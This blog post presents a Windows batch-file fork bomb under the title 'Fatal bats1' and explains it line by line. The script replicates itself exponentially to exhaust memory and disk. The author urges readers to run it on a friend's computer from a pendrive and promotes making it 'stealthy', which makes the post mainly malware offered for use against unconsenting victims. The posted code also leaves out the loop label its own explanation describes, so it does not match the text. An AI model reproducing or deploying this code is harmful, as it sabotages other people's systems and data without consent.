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- Fatal bats1
Posted by : Unknown
Thursday, 1 August 2013
ya,kind of cathy name ;) today we will see a method to clog up peoples ram,crunch the hard disk space and leave their system completely useless untill their next format.
first let me just show you the code and then i'lll start explaining it.
@echo off
set /a x = %random%
type firstnode.bat >> %x%.bat
start %x%.bat
goto loop
- open up a notepad,copy the above code and paste it in it.
- click save as,and thengive it a name "firstnode.bat" [do not use any other name]
- change the file type to all files,click save.
ok,lets discuss the code.basically *.bat is an extension which allows you to run CMD or command prompt instructions.
- @echo off : this peice here instructs to turn off the display of current directory evry time it runs.
- :loop this indicates that a loop with reference"loop"is starting from here
- set /a x = %random% this sets a random number into variable x
- type firstnode.bat >> %x%.bat this line makes a copy of the contents of the file "firstnode.bat" and wirtes them to a file named after the random number returned from random with a bat extension
- start %x%.bat it starts or calls the file created in the previous step,and that file starts running independently.
- goto loop this says to go back to the step "loop" and start executing again.
so totally what the code does is,first it creates a copy of itself,then calls it and from then,both of them create individual copies of themselves (total of 4 up to now) and the cycle continues until the ram has no more memory to allocate and crashes or even the hard disk may run out of disk space and crash.
it grows in an exponential manner,ie., for every n itiration,2^n files are created and are running,that goes like1,2,4,8....... by the time just about 10-20 itirations are performed,system crashes it takes just about 30 to 40 seconds to crash any system.
Executing it:
Never ever try this on your own system!!
- copy this file to a pendrive,
- take it to your friends system,copy the file into another drive like d: or f: or even desktop,then double click it.(don't execute it directly from the pendrive)
And you can take a look at our attatchments section or our fatal bats series to make this process entirely autonomous and stealthy and take it to the next level :)
you can watch the below video in which i've used a xp virtual machine to run the bat and you can see the consequences.in the video. i've run the batch on the desktop,oh dat poor guy ;)
Cleaning up the mess:
- To stop it,simply reboot the system manually, ( unplug it! ) and then restart your system.the go to the folder in which you've executed the previous file,in my case,its the desktop itself.
- Now create another file with name "clean.bat" and enter the following code
del *.bat
- And execute it. thats it,you are done,but be careful,do not open up any of the previously created files or else you must suffer once again!
TIP: After creating clean.bat,sort the files by modified and descending to get to it quickly,or else just use the search to locate it.